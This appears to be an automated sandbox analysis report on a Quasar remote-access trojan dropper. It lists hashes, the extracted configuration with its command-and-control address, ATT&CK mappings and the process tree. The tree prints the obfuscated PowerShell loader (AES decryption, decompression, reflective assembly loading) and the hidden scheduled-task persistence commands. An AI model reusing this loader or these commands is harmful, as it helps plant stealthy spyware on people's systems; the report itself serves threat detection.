quasar | 5a88206b2a68e2c0175d091b3a0c7b133a1b35740b4acc33f5aaebe23fc97e46

General

Target

Client-built.bat
Size

1.9MB
MD5

44523454be47061f187cfdc2ec60834a
SHA1

86136762b9296ef6517bc01b7764e59398bab09b
SHA256

5a88206b2a68e2c0175d091b3a0c7b133a1b35740b4acc33f5aaebe23fc97e46
SHA512

4c5f35a45ff1cfc394e19bbf1e4080fd43ea2ef9880b16b6fc316c85dc7fbdb222d03821224b3eac90a971c8f69a05ac96d86f7367cad658cfb229bf5f966080
SSDEEP

24576:kxASqRPmTwkE+UrVuwEQ6/RZhDGYAiM37i9yfela6S2ZZoB+a7ZpFifK7+tLe61s:k+TEwl7Q865Zuimi7/E4mp7kScR0

Score

10^/10

quasar new execution spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.0.0

Botnet

New

C2

even-lemon.gl.at.ply.gg:33587

Mutex

2bce5514-d527-4787-825c-3042f9dd5ede

Attributes

encryption_key
501DB7A849356BF2C272A70D53FAF39F17D4245C
install_name
WinHost32.exe
log_directory
UpdateLogs
reconnect_delay
3000
startup_key
Powershell
subdirectory
System32

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 1 IoCs

Processes:

resource	yara_rule
behavioral3/memory/3336-96-0x000001604A7D0000-0x000001604AAEE000-memory.dmp	family_quasar

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

2132 powershell.exe
5004 powershell.exe
3336 powershell.exe
Executes dropped EXE 1 IoCs

Processes:

WinHost32.exe

pid process

1452 WinHost32.exe

pid	process
1452	WinHost32.exe

Drops file in System32 directory 5 IoCs

Processes:

svchost.exesvchost.exesvchost.exe

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Powershell	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

2160 schtasks.exe

pid	process
2160	schtasks.exe

Modifies data under HKEY_USERS 9 IoCs

Processes:

svchost.exesvchost.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\NgcRecovery.dll,-100 = "Windows Hello Recovery Key Encryption"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124 = "Document Encryption"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\ci.dll,-100 = "Isolated User Mode (IUM)"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\ci.dll,-101 = "Enclave"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103 = "Domain Name System (DNS) Server Trust"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\fveui.dll,-843 = "BitLocker Drive Encryption"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\fveui.dll,-844 = "BitLocker Data Recovery Agent"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\wuaueng.dll,-400 = "Windows Update"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe

Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 22 IoCs

Processes:

powershell.exepowershell.exepowershell.exeWinHost32.exe

pid	process
2132	powershell.exe
2132	powershell.exe
5004	powershell.exe
5004	powershell.exe
3336	powershell.exe
3336	powershell.exe
3336	powershell.exe
3336	powershell.exe
3336	powershell.exe
3336	powershell.exe
3336	powershell.exe
3336	powershell.exe
3336	powershell.exe
3336	powershell.exe
3336	powershell.exe
3336	powershell.exe
3336	powershell.exe
3336	powershell.exe
3336	powershell.exe
3336	powershell.exe
1452	WinHost32.exe
1452	WinHost32.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2132	powershell.exe
Token: SeDebugPrivilege	5004	powershell.exe
Token: SeIncreaseQuotaPrivilege	5004	powershell.exe
Token: SeSecurityPrivilege	5004	powershell.exe
Token: SeTakeOwnershipPrivilege	5004	powershell.exe
Token: SeLoadDriverPrivilege	5004	powershell.exe
Token: SeSystemProfilePrivilege	5004	powershell.exe
Token: SeSystemtimePrivilege	5004	powershell.exe
Token: SeProfSingleProcessPrivilege	5004	powershell.exe
Token: SeIncBasePriorityPrivilege	5004	powershell.exe
Token: SeCreatePagefilePrivilege	5004	powershell.exe
Token: SeBackupPrivilege	5004	powershell.exe
Token: SeRestorePrivilege	5004	powershell.exe
Token: SeShutdownPrivilege	5004	powershell.exe
Token: SeDebugPrivilege	5004	powershell.exe
Token: SeSystemEnvironmentPrivilege	5004	powershell.exe
Token: SeRemoteShutdownPrivilege	5004	powershell.exe
Token: SeUndockPrivilege	5004	powershell.exe
Token: SeManageVolumePrivilege	5004	powershell.exe
Token: 33	5004	powershell.exe
Token: 34	5004	powershell.exe
Token: 35	5004	powershell.exe
Token: 36	5004	powershell.exe
Token: SeIncreaseQuotaPrivilege	5004	powershell.exe
Token: SeSecurityPrivilege	5004	powershell.exe
Token: SeTakeOwnershipPrivilege	5004	powershell.exe
Token: SeLoadDriverPrivilege	5004	powershell.exe
Token: SeSystemProfilePrivilege	5004	powershell.exe
Token: SeSystemtimePrivilege	5004	powershell.exe
Token: SeProfSingleProcessPrivilege	5004	powershell.exe
Token: SeIncBasePriorityPrivilege	5004	powershell.exe
Token: SeCreatePagefilePrivilege	5004	powershell.exe
Token: SeBackupPrivilege	5004	powershell.exe
Token: SeRestorePrivilege	5004	powershell.exe
Token: SeShutdownPrivilege	5004	powershell.exe
Token: SeDebugPrivilege	5004	powershell.exe
Token: SeSystemEnvironmentPrivilege	5004	powershell.exe
Token: SeRemoteShutdownPrivilege	5004	powershell.exe
Token: SeUndockPrivilege	5004	powershell.exe
Token: SeManageVolumePrivilege	5004	powershell.exe
Token: 33	5004	powershell.exe
Token: 34	5004	powershell.exe
Token: 35	5004	powershell.exe
Token: 36	5004	powershell.exe
Token: SeIncreaseQuotaPrivilege	5004	powershell.exe
Token: SeSecurityPrivilege	5004	powershell.exe
Token: SeTakeOwnershipPrivilege	5004	powershell.exe
Token: SeLoadDriverPrivilege	5004	powershell.exe
Token: SeSystemProfilePrivilege	5004	powershell.exe
Token: SeSystemtimePrivilege	5004	powershell.exe
Token: SeProfSingleProcessPrivilege	5004	powershell.exe
Token: SeIncBasePriorityPrivilege	5004	powershell.exe
Token: SeCreatePagefilePrivilege	5004	powershell.exe
Token: SeBackupPrivilege	5004	powershell.exe
Token: SeRestorePrivilege	5004	powershell.exe
Token: SeShutdownPrivilege	5004	powershell.exe
Token: SeDebugPrivilege	5004	powershell.exe
Token: SeSystemEnvironmentPrivilege	5004	powershell.exe
Token: SeRemoteShutdownPrivilege	5004	powershell.exe
Token: SeUndockPrivilege	5004	powershell.exe
Token: SeManageVolumePrivilege	5004	powershell.exe
Token: 33	5004	powershell.exe
Token: 34	5004	powershell.exe
Token: 35	5004	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exepowershell.exeWScript.execmd.exepowershell.exe

description	pid	process	target process
PID 2416 wrote to memory of 4644	2416	cmd.exe	cmd.exe
PID 2416 wrote to memory of 4644	2416	cmd.exe	cmd.exe
PID 2416 wrote to memory of 2132	2416	cmd.exe	powershell.exe
PID 2416 wrote to memory of 2132	2416	cmd.exe	powershell.exe
PID 2132 wrote to memory of 5004	2132	powershell.exe	powershell.exe
PID 2132 wrote to memory of 5004	2132	powershell.exe	powershell.exe
PID 2132 wrote to memory of 3940	2132	powershell.exe	WScript.exe
PID 2132 wrote to memory of 3940	2132	powershell.exe	WScript.exe
PID 3940 wrote to memory of 1596	3940	WScript.exe	cmd.exe
PID 3940 wrote to memory of 1596	3940	WScript.exe	cmd.exe
PID 1596 wrote to memory of 2976	1596	cmd.exe	cmd.exe
PID 1596 wrote to memory of 2976	1596	cmd.exe	cmd.exe
PID 1596 wrote to memory of 3336	1596	cmd.exe	powershell.exe
PID 1596 wrote to memory of 3336	1596	cmd.exe	powershell.exe
PID 3336 wrote to memory of 3276	3336	powershell.exe	Explorer.EXE
PID 3336 wrote to memory of 3188	3336	powershell.exe	svchost.exe
PID 3336 wrote to memory of 1768	3336	powershell.exe	svchost.exe
PID 3336 wrote to memory of 2552	3336	powershell.exe	svchost.exe
PID 3336 wrote to memory of 1760	3336	powershell.exe	svchost.exe
PID 3336 wrote to memory of 1364	3336	powershell.exe	svchost.exe
PID 3336 wrote to memory of 2544	3336	powershell.exe	svchost.exe
PID 3336 wrote to memory of 2736	3336	powershell.exe	svchost.exe
PID 3336 wrote to memory of 1156	3336	powershell.exe	svchost.exe
PID 3336 wrote to memory of 948	3336	powershell.exe	svchost.exe
PID 3336 wrote to memory of 2720	3336	powershell.exe	svchost.exe
PID 3336 wrote to memory of 2712	3336	powershell.exe	svchost.exe
PID 3336 wrote to memory of 2316	3336	powershell.exe	svchost.exe
PID 3336 wrote to memory of 1524	3336	powershell.exe	svchost.exe
PID 3336 wrote to memory of 1720	3336	powershell.exe	svchost.exe
PID 3336 wrote to memory of 1916	3336	powershell.exe	svchost.exe
PID 3336 wrote to memory of 732	3336	powershell.exe	svchost.exe
PID 3336 wrote to memory of 1908	3336	powershell.exe	svchost.exe
PID 3336 wrote to memory of 1316	3336	powershell.exe	svchost.exe
PID 3336 wrote to memory of 1708	3336	powershell.exe	svchost.exe
PID 3336 wrote to memory of 1112	3336	powershell.exe	svchost.exe
PID 3336 wrote to memory of 3996	3336	powershell.exe	svchost.exe
PID 3336 wrote to memory of 2676	3336	powershell.exe	svchost.exe
PID 3336 wrote to memory of 3456	3336	powershell.exe	svchost.exe
PID 3336 wrote to memory of 932	3336	powershell.exe	svchost.exe
PID 3336 wrote to memory of 2072	3336	powershell.exe	svchost.exe
PID 3336 wrote to memory of 1872	3336	powershell.exe	svchost.exe
PID 3336 wrote to memory of 1004	3336	powershell.exe	svchost.exe
PID 3336 wrote to memory of 1268	3336	powershell.exe	svchost.exe
PID 3336 wrote to memory of 4212	3336	powershell.exe	svchost.exe
PID 3336 wrote to memory of 2040	3336	powershell.exe	svchost.exe
PID 3336 wrote to memory of 2432	3336	powershell.exe	svchost.exe
PID 3336 wrote to memory of 3416	3336	powershell.exe	svchost.exe
PID 3336 wrote to memory of 1836	3336	powershell.exe	svchost.exe
PID 3336 wrote to memory of 4392	3336	powershell.exe	svchost.exe
PID 3336 wrote to memory of 1632	3336	powershell.exe	svchost.exe
PID 3336 wrote to memory of 1092	3336	powershell.exe	svchost.exe
PID 3336 wrote to memory of 1228	3336	powershell.exe	svchost.exe
PID 3336 wrote to memory of 2212	3336	powershell.exe	svchost.exe
PID 3336 wrote to memory of 832	3336	powershell.exe	svchost.exe
PID 3336 wrote to memory of 1616	3336	powershell.exe	svchost.exe
PID 3336 wrote to memory of 2364	3336	powershell.exe	svchost.exe
PID 3336 wrote to memory of 1824	3336	powershell.exe	svchost.exe
PID 3336 wrote to memory of 1012	3336	powershell.exe	svchost.exe
PID 3336 wrote to memory of 2584	3336	powershell.exe	svchost.exe
PID 3336 wrote to memory of 1400	3336	powershell.exe	svchost.exe
PID 3336 wrote to memory of 1084	3336	powershell.exe	svchost.exe
PID 3336 wrote to memory of 2160	3336	powershell.exe	schtasks.exe
PID 3336 wrote to memory of 2160	3336	powershell.exe	schtasks.exe
PID 3336 wrote to memory of 1452	3336	powershell.exe	WinHost32.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
1⤵
PID:832

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS -p
1⤵
PID:948

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:1004

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:732

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:932

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1084

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1092

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
1⤵
PID:1112

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1156

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1228

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
1⤵
PID:1268

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1316

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1364

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1400

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1524

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1616

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1632

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:1708

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1720

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1768

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1824

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1872

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1908

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1916

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2040

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1760

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
1⤵
PID:2316

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2364

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2432

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2544

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2552

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2584

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2676

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2712

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2720

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2736

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:1836

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3276

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Client-built.bat"
2⤵
- Suspicious use of WriteProcessMemory
PID:2416

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x6hdqcq6RQXKzI+eGl8CbwQw2wLZYw/QJkpI6zt6Pbk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YoKnI+WawYMIiLnyESSOGA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FjMIz=New-Object System.IO.MemoryStream(,$param_var); $kYBsW=New-Object System.IO.MemoryStream; $uBkWK=New-Object System.IO.Compression.GZipStream($FjMIz, [IO.Compression.CompressionMode]::Decompress); $uBkWK.CopyTo($kYBsW); $uBkWK.Dispose(); $FjMIz.Dispose(); $kYBsW.Dispose(); $kYBsW.ToArray();}function execute_function($param_var,$param2_var){ $JrFjv=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $WDOAj=$JrFjv.EntryPoint; $WDOAj.Invoke($null, $param2_var);}$ycLaV = 'C:\Users\Admin\AppData\Local\Temp\Client-built.bat';$host.UI.RawUI.WindowTitle = $ycLaV;$oVuwF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ycLaV).Split([Environment]::NewLine);foreach ($UjVkN in $oVuwF) { if ($UjVkN.StartsWith('guNjsQMfaoHUnLlawqMv')) { $RczWa=$UjVkN.Substring(20); break; }}$payloads_var=[string[]]$RczWa.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
3⤵
PID:4644

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2132

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_891_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_891.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5004

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_891.vbs"
4⤵
- Suspicious use of WriteProcessMemory
PID:3940

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_891.bat" "
5⤵
- Suspicious use of WriteProcessMemory
PID:1596

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x6hdqcq6RQXKzI+eGl8CbwQw2wLZYw/QJkpI6zt6Pbk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YoKnI+WawYMIiLnyESSOGA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FjMIz=New-Object System.IO.MemoryStream(,$param_var); $kYBsW=New-Object System.IO.MemoryStream; $uBkWK=New-Object System.IO.Compression.GZipStream($FjMIz, [IO.Compression.CompressionMode]::Decompress); $uBkWK.CopyTo($kYBsW); $uBkWK.Dispose(); $FjMIz.Dispose(); $kYBsW.Dispose(); $kYBsW.ToArray();}function execute_function($param_var,$param2_var){ $JrFjv=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $WDOAj=$JrFjv.EntryPoint; $WDOAj.Invoke($null, $param2_var);}$ycLaV = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_891.bat';$host.UI.RawUI.WindowTitle = $ycLaV;$oVuwF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ycLaV).Split([Environment]::NewLine);foreach ($UjVkN in $oVuwF) { if ($UjVkN.StartsWith('guNjsQMfaoHUnLlawqMv')) { $RczWa=$UjVkN.Substring(20); break; }}$payloads_var=[string[]]$RczWa.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
6⤵
PID:2976

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3336

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\System32\WinHost32.exe" /rl HIGHEST /f
7⤵
- Creates scheduled task(s)
PID:2160

C:\Users\Admin\AppData\Roaming\System32\WinHost32.exe
"C:\Users\Admin\AppData\Roaming\System32\WinHost32.exe"
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1452

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3416

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:3456

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
1⤵
PID:3996

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
1⤵
PID:4392

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:3188

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:1012

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:2072

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:4212

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:2212

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

Scheduled Task/Job

Persistence

Scheduled Task/Job

1

T1053

Privilege Escalation

Scheduled Task/Job

1

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
df472dcddb36aa24247f8c8d8a517bd7

SHA1
6f54967355e507294cbc86662a6fbeedac9d7030

SHA256
e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

SHA512
06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
1KB

MD5
2f55724074f31252414071cd9a35ce75

SHA1
80b611f1d4ce470ef6762974624e8aa3ce6396d0

SHA256
cb0b8551c0c93b8834953dbacfc1ad6096993418953793147cb6051fb8f86eb4

SHA512
af7efb1793b8db18f64bce1a0b23e227d41fab1cb1d5b2031a0f5e7f2c0e20c7aa408b464c34c0575ecc5dac4c2f4ce507888d3bedd82447f78fd3d61e503be1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
1KB

MD5
b49b4568e58d92adb2364d63f8e93e40

SHA1
2f3ea5c739d4bf93fc706580e91a284d05f8809f

SHA256
4d684f3c0fdaf79abec51fb181b2aef1a9ce532408bdc06d6aa6b0c114b699e7

SHA512
2054bf5fc94786910886410a32b3e80a72d6cbc297c8126129c898048224825f520aa134287040abfc19864e672ed2d56ba1dd4ec5e0efca87b2e5c8182da050

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pfitanay.hui.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_891.bat

Filesize
1.9MB

MD5
44523454be47061f187cfdc2ec60834a

SHA1
86136762b9296ef6517bc01b7764e59398bab09b

SHA256
5a88206b2a68e2c0175d091b3a0c7b133a1b35740b4acc33f5aaebe23fc97e46

SHA512
4c5f35a45ff1cfc394e19bbf1e4080fd43ea2ef9880b16b6fc316c85dc7fbdb222d03821224b3eac90a971c8f69a05ac96d86f7367cad658cfb229bf5f966080

Download Submit
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_891.vbs

Filesize
124B

MD5
fe347cef3b63ba76cddafbb929c9aad5

SHA1
41d06c23b1d6bfbaca5d01e79034374b268add5f

SHA256
bc9251039b0ce70fdcac8189386f956dfcacc72a1b5379b259b345c3e3a8c47e

SHA512
